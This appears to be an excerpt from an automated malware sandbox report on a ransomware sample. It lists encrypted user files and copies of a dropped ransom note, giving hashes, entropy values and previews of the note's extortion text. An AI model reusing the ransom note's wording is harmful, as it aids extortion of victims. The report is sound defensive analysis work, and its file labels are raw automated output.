          SSDEEP:24:ykc7X770XplZpSSv6GIyLUCrUXGVKZxOaozXADn+zCZK:yksX7MplttIyYrGVKZHUu+eg
          MD5:BE1B43067B4638785713A9A4BA436001
          SHA1:1AE32D3D4EEE8183C878F4E868BF73832DF073E5
          SHA-256:9C64D996F4E58208F146D85B5969565E020893D74EDDE108ACAF32501A2FA067
          SHA-512:BF1893F7F881AA93C5A6AD9CFB700EAFD942F9529A6B5739ECEF8844BB81BD56EACFA4C8ABC0DB2BC38E2F907EB2CAD1EEF9FBF6D9522E02C8CC03865FFCCEC2
          Malicious:false
          Preview: 4.#x..m.E....r.l......|+l....[.)V2zY...%J\....d.A..Z...h.K.9:.J...O..".Lb...V.'..W.fE.s../...G...n.@..9l'.....P....`.*.,..0.v.....G..}....4b.=$..PrA..[...?....<S...]s...C.o....j.......1.3V.7......7....{.m....7]..[...{d^XB.Q)r...)...FLt%,.U....w...c.....lL..`\......{W9.]....&........2x..7..Y............NW.%.w...5..z.'`-..c...<..|/..l..Zl.1...gI.7.D/nN.n....+H.B.~.\g548...r^........%.d...!..'%%.l..k.....cT.{"..1.<.Z %C..M..$.....G.*.C.-9R.B.1r.X....<.A;..D.9..]...<u..c.a!m...%l.z%..D.^..q......e.Jk.k|. .! .!{<.4..+ib...o)..M....<oX...#.{3;...Q.f.V.B......rK....8../.T.>|."O...-.C....M.s?..C....E..S=B..]...Da..H._$/R.z....:..Bo...0.-.. ......%.?...k>..`..mSa?..D.e.O..Ds.M..3..q;.y.cD...jzm.H..z\.U....Zc..L.]+{.........../...}89T.|{C).5..^Y.O..S.Dp........ef........'/.n.V#x7.E@G..;..?.......W9.m.)v.(...0.e-.T......uu.W8..Q.......Q..!#.F[.Q..5..^.H\O^......'.rDc1..%P$...pS.L...x...]:...d....V.;.8...P.w;n...p`..nKZ7.G1.U..0V..C\.j..@..t4....iD
          C:\Users\user\Desktop\FENIVHOIKN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\GIGIYTFFYT\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839986346856209
          Encrypted:false
          SSDEEP:24:C68BynI5WCAZoqq6C4K8u51A+//9JiZhiD+bh8svDcxMMXADn+zxVyQu:KgTZoR6CCy1AAshM+bh8svQMcu+U
          MD5:798F28CBAD7987AA41ECFDE3144A3215
          SHA1:FD250AE6BA5DDF6D3316D7071C1317C425318D41
          SHA-256:E00FB8553CE588711C7D1771F8765667EE24FA2DD424B482FAE7797DD6BFA406
          SHA-512:B97D5911DD903B48F1348EE5EF1D4B85A035810755905173A9963E6CA2AD2A1CB10D44278B2E1075AAC50DA7E9BBEC6650EFE2DC0D0C1E19723B6D2FD32AD56B
          Malicious:false
          Preview: U.s.*+....1.{....+.4....3.6...J[{.%...=H.-...:.....PR...m..o......u]../qh....;..l..4VW)....yXx...2..c.)....9b,..3_K.0.u5.[..:@...?.y1...`.V.....,f_].W..k\.D."..Z.8l...@.v_B.'..<.....wi...H....j=.C[.N+2o.5....BAk.$...Sgw.o.gw..:.......L....P......"..._q3...y].,..'""..=|.-.b...=!...=G.......M.MW-.C....L9.gR.X..O.p.....>H^...dX..2........jX_('..p...-..vs...;Ck.#.....g...I.O2.zF..#...qf...P#F&.W6....\.rf.[m.w........I....\(-....L)$.....1.....I..)...a..^..`..h..j..........E...g.e`~.&.F....5(..d{.[.....YlE...m..X>.;G....h...Q.y..I..B..@......./e..-8<.=.._...1\.p.e....X...p5..@.Ts<....Z..H.....=..y.6..a.._.+.1!..H..(....s.....*ZS.xo ....)j.oQ;[.%[s.d..Of.L...`B.;w......*w..r..KVm.,...I.l..5L..l..En)...j4.`k.'(..*..3>r...o..!8......A.}o+.....f...?o.N.ag.....`Dh..<VX)..c...W%.x.`...+r.k.."....q.-&.,.....=.v".....V..)..r.}.d`..Q.f.ybC........r?.n....s..r......@..Z..M..<$.|.PA{.7w....5[Z..q.le.>$H.....)]....g.H6e.Y.<v.T.......T....".w.8.
          C:\Users\user\Desktop\GRXZDKKVDB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844964817865042
          Encrypted:false
          SSDEEP:24:Ix9BJTc9kvgPbNlTmXBNfFUGk2ib5gGbB+u2XADn+zkyQ:IxLBako5l6XBtFK24bBwu+AH
          MD5:3623899307A1093E87BF0BB7A4B53A55
          SHA1:9AF384BA4A2714E746DBBA6BD8C62B6932B1EA85
          SHA-256:A6B4F8231E0535085F7C9514279082064F6D38AA66C8BFCCA3990FF7968DD7DC
          SHA-512:07D1D52F715724AF3BEF3249901D1BD545910BD0287CFFE34432E939637EA4B3725F66CC43D6FFAD1633318D8072648FBC745513EEB3823A40EEB5590ABDC80A
          Malicious:false
          Preview: ... .r0....C.u..=.....}.......a........m.*.h.Gk../.`F.S.UMD.@-.H...Z]\?Hv.nB...MC...L..WV..E.B.........kB.]$.....2X%........ *....;....2)....O....."...3N..9A].....S."_Jz..@W_'1Y.:&.%...X.{.....U...X..(.....U1...#...r"-3..i.weN..KV..1....t..=......Um-....|.....[t....A..N...p.....T....:0.d>.j;.. E....%..2.n...I.......H.~IG....qx.ty..l.;....MD..... .xf.......v\..t.W.. ......&.#]........B|>..."&.f....x...m.. ....V..PS.]...m.P..3..-d.....I..7&.u.*.2 ....O".yy..T.%`.9.o...c..P..e.Qucn@.w$..]2...>I.2.X..r..#...~a...(./>.`.y..M...M...."...W..g..H.-s}.....>.7.m.q.....Ns.?y..#2.'.cY..~LD.~..!.j@.O....o.By...:~.v.i.y.....A..<E.....E;.F.._5T.T..vl.. ..ee.k.rn\.\...)][!>.=...t.\...h.\...[..(.v.<}2.w...bu...vO....0.l.!.&.....}z.T.6"j.._#6..f....`Y....UC...P.n.fd...._......;AI.x...........AILm<~G...M.7...@.j.G.q.........a..l+.x..".v..7.P....f......'.....L(=.B..q..A}.......@..C.....`r..!'..7...4....`..ZA..jC.f}G:@....q..\,..f.x....... G+u+..:..{.vi=. .......
          C:\Users\user\Desktop\MXPXCVPDVN\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844193018773982
          Encrypted:false
          SSDEEP:24:2rZ+RffmzdCn2qz4scTi5ywNCv60XrIe0pvDkTgOBJSJXADn+zMO1Y:ko4Cn29scW5ZCXrzZZeu+r1Y
          MD5:0C8A4BED8065D32B14E49B2ADE05E778
          SHA1:5C205464F50A52FE0A52D98707DD5DAA182BF7DA
          SHA-256:4C08266ECBC4B829A812827E00A334F1DB0A92F134B0BEB4300218F184EF2608
          SHA-512:1FDF724A263C7BAB1B2AFD0DFECD9EF742A2269459037A80F0552B1F3D4FFAED7398CED8E2CDE79AC8194923BB851D6F0D9A2D2DD7A6509CC02D5E86C2B931AE
          Malicious:false
          Preview: .......bh.@..9^7d...H..#.2../F.\e.S....w...T..V4..&t..lje.{.e}y0.o..h./.VD.<.fh.&x.=.... 4..s.S..|.K.Jx.r..x.x......G...4....]...&..* ....fS.^..y=......M....`.......F.....|..O@OE{.D8-...U. .v.v...iW.(....1.......g.ss@.....g.a..b.Z[.(.....~g.u....e9I*dU.J.P.j.A{.n..Ig......e.......a...5?......,U.e.W<c.....Zq.....P".....V .&y.L..0.D.&m..^.^X.n>..@6....5.......;.]...zb.....+.&...cQ..R..6.4)>....?5...&N=..U.[l*....f...a....Q*S..0.....T...]K.!9V.......e...pnn...-x.{...n.m..T...M;.....YI0....*.W..Pm.K...4e.r.*...L3.&vV-.CY......p.t$..>...A]:u.->...e...a....<.%B.:...1z.,...dM.!....M=.S............t....W....2.....\..Y..^U!....I-...6....../}...xt..(s.!y...k?.i.. 2`..j.....F..NS..6&......w.+V....9ld......p.e(..gP.?".b..!.tdeP..........sg..Q.([.=aR.8t..G.P........m.Nm(.d?..a..R.......`{......-v..Z..nl...H..*@.j[g..B.?...e.zx<.].M.n...O#.9..}.x..v.[....mS.~zL.-..;.aXm.|...w.+...=.../zd...yL....=.I...m9[....-..sE0...s.O..i......H\...j..R.$.@...U.d..C....
          C:\Users\user\Desktop\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.852919673243158
          Encrypted:false
          SSDEEP:24:pnp0Uc13OQatCpvBicW/fRcNxMHK7jn+iCe24wZ4XNQ5H2MEu2pXADn+zpp:pn+UtAl6Rc3njtVmq25WME1u+j
          MD5:F5F483D940962927282A44C18AAD30A9
          SHA1:006AA6D47AFC2C3CE1A3D1CC1E6AFBA47516C756
          SHA-256:B24427FA9126E49039C3D014EF968C180D74A316D051ABBE24D5D914CABD5739
          SHA-512:8F905B13E7B2E28648F9988DF10135150423D095A9CD1CB71E503960FE514874792CD6E0F4A052868D4F59901ADF103532CE4E7CCD5118BAB725CEBBE6065324
          Malicious:false
          Preview: ...i.d ...q....N..=..x..SFt\...0.a+2W......Fc./xy+...=k.......<6....{...x.O.H....e[C.u3.....b6y.~../7N.:.f..\d..|..n...G9....x..K.Y.p.$F.......g+)H.n>....Q&<f.-.(.\.:.t.'^.X..`.#...e...bm...X....;...]G.!Z|..f.U.....t.......O.....U./q... ......V..*...-4O.(..Po......N...s$.A..Z.p'..j....._....v.4@.....:...<.....I..u...wN.$q....`.\.+._u.....s...k.....)GA..-.fD|.Z....Qy#*..;..FW..w.....h-.O..j.W(FQ...@2..sg+.....v..K......+~.!\....l..#......i...qOQ..>.....'_Jd7.;1/.B.Y/.{.o?t....,...........n....e..rm.A...yq.}t...2.l......zi..E..........b...m5p..Hx?.(^..@.6.2...I....D5.e.q...._...S[.w\M.Y2.ML.q.......~.4%G......a^B9.....B..^.s.}....>..(..6zw~.w.F._.I...|-.\.....6.:.j2...D.._h..k..Vj.p......b5..Z/.O'..&..g...KL.r......s..,.g..4....4.J.]..3...../.....<V.%.......5..P#.&.....umu.X.mY.....#.....-.........). ..T.S.BE..._.].80.D.......^N@u..;..V....P...(=....Xt.Z8..u..v!.=.1v.Wd..e..z.eFnq?,...)...&<..G..(..}..x..P.E6............b.c..w .A?43j....ls.}...T..
          C:\Users\user\Desktop\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.845358229379643
          Encrypted:false
          SSDEEP:24:L5GXHW0uxYglchnZroRnespgx4XADn+zZ:wg2hnyRnestu+9
          MD5:B0A4FD2CC15598E584EEF0147A06C042
          SHA1:4020EFFCACBFBB4DB98D97A81DC36B2D2447FF5E
          SHA-256:27B365FA167018958BF1417207F221CD77441D8A11D0FA757E4B32FA0907131D
          SHA-512:FE1F628772FB063D584CDF42FA51B857C43BA20A0DAEE53BD6E44F3F7A095EE5BCFFA84A33A3B9FDC60F510A5ADDD6E5DD5E5AF635AB61103DE654B6674F76E6
          Malicious:true
          C:\Users\user\Desktop\PWCCAWLGRE\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
Preview (UTF-16LE text, decoded; truncated in the report):
          ---=== Welcome. Again. ===---
          [+] Whats Happen? [+]
          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
          [+] What guarantees? [+]
          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Desktop\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.875238228486163
          Encrypted:false
          SSDEEP:24:F+08rdiwTCrPiRNTQ9JDs95otfXza2EAerJ1h5XADn+zMU4:38hMrP0NiDsQthEAet1nu+Iv
          MD5:AB33E7CD149A433DC875E5F807B6F83E
          SHA1:D0A7F1E66346D442B8389AA177AAB70405D1F2A9
          SHA-256:8AD2962DDC26F061FE2522E4BE4961ADBD73DD3243F57FC2776435F219CAC1CD
          SHA-512:FEE22EA28E18CBE3739F00774F6740A60FF7355F180B1EA82916F13B6CC7CBAEBEBA0FC3D3CDC7CAD837AE9E58C6BEE119D3F27C470A32E6FB061E7A8CABFC34
          Malicious:false
          C:\Users\user\Desktop\QNCYCDFIJJ\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
Preview (UTF-16LE text, decoded; truncated in the report):
          ---=== Welcome. Again. ===---
          [+] Whats Happen? [+]
          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
          [+] What guarantees? [+]
          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Desktop\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8462724480384844
          Encrypted:false
          SSDEEP:24:JvN2PN/7qvSOMHSJQj7uLnqRbHcDS9Dgjs/XADn+ztgrO:Jv8PNzq6fqQjjRb8wGUu+pkO
          MD5:1A2336EB8C69254CF9C753BAB84D1D52
          SHA1:9566CBDFEB607B9B9E4C103B6B18A3A62BE2408C
          SHA-256:39E7F00F8EC3C9E7DE7E0F1C2814F940BC1FAAC25DB80AF5C20825CEFD005392
          SHA-512:8198014E32997CCD5CD51FCAE07833AAC9F2AADACF037FDD1032306807340A159177B13AA186DEEEEF40A4A4EE4AB07637687AFD8219CD3720BD9D55BB2AD917
          Malicious:false
          C:\Users\user\Desktop\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.828719984393646
          Encrypted:false
          SSDEEP:24:T1uf7CUs+OC81i31yBu4d5hPrkaMiBcdNV+DTBEs93KF5HXADn+z4ZYj:0f7CUsVLQ0Bu6n43GcdNzGKFlu+sZO
          MD5:39FC0497CBCBCA919EC449C4647FAD66
          SHA1:A628B8A8E32E31615C1E0F3E63CAFF2355633F50
          SHA-256:800F2BED6551EC7A3D33DF74E25A1200337C1635F9CEDE73866AB83BEE0C1A4D
          SHA-512:8191FF2E5C37980DC5514CD80686DA581B637F61E52CCA3EB36618DE123D6A7FEA0FA4207E8B3E7D97A8ED599EBAEF36AC3F7E91053FEC9456B8DBE060B6A85D
          Malicious:false
          C:\Users\user\Desktop\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839612869093501
          Encrypted:false
          SSDEEP:24:GU/zyFnCcrZCAOfmMdrpDvBlnqXDSuH/cVOxWRoy89qHXADn+zfhr:GU/2CcFCAar5Jlib/4OxWnsyu+jJ
          MD5:BB7E261BD79C6C6E201375D59E1440C4
          SHA1:0472B27D1685456515E70E3CBA88B751998203A0
          SHA-256:99AFC292D11CE8BC1C52812BD7D917811F5744782CA42CD758A81210555487A7
          SHA-512:0AF2E8AE8E64E2E15A153AC7150DA89352E7257D14CB6F0EAE54B38DD185554CB4AB50E4BE2712D6CFAC48DA388DA3B357DF505A7242CCC76E4A2A20961857AE
          Malicious:false
          C:\Users\user\Desktop\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.826010945098069
          Encrypted:false
          SSDEEP:24:8yrMK0qhVx+OVAFywQ4gokusFW3BvkAi0DFSpC28eqrJoz+KUyl+EY2XADn+zW3:vrMK/NVQywQxoEFMvNiM99N/yl+Yu+K3
          MD5:E897EBC1B148A4C5ED28573673799296
          SHA1:4D9E71A2AEC9F99B3A87C84F4FC04707D6543357
          SHA-256:48E276D9973A647CC44FEB15B31DC3880BB036EF799350C81B5CDBA662283A3B
          SHA-512:FDB4B92B193DDBBC33C556BDB577E416E81D987E16B83C7DCBE0504483C46479651957B3B1F7BD2894526AC9182B6B55D19DEA13CE2AEBC214688C5979BB2287
          Malicious:false
          C:\Users\user\Desktop\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.848102572216207
          Encrypted:false
          SSDEEP:24:NV52AgNKAaX7alOpQT8Q8yD8x17XFnRpc3lKtHPHXADn+zN6fl:NV52ASy7SOKTMyD8PXFRpcI3u+p6t
          MD5:6BF7190EBD6376ACB78BF3DBA1C2042E
          SHA1:F8F3519A3ABA8D547D402D24966D5C05D8E9B503
          SHA-256:13C909E8C4A6285D2922FA3F29F0FE810B934D7508BE5DEFFEE5E6D70A958619
          SHA-512:CEA757CD5356CB07159154C387BE190C32CEA299B70CC70AC5D95382A83DF68197FF8D66D797BE3A6B3E57BD2E2A177010054478630FF556B8AF537F6300624F
          Malicious:false
          C:\Users\user\Desktop\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.824754931739691
          Encrypted:false
          SSDEEP:24:KnrdMC57+wIdniXhqNoiOg7p3BpfFjLI+W/7rCn6PuDDflXADn+z9K8:ydMY1IiRw7px/w+cr46PuDDfRu+Zf
          MD5:7C115EE12078ECA32407AB5EB5870BF6
          SHA1:994EA32900871DD514D822010209438E3AF77C6E
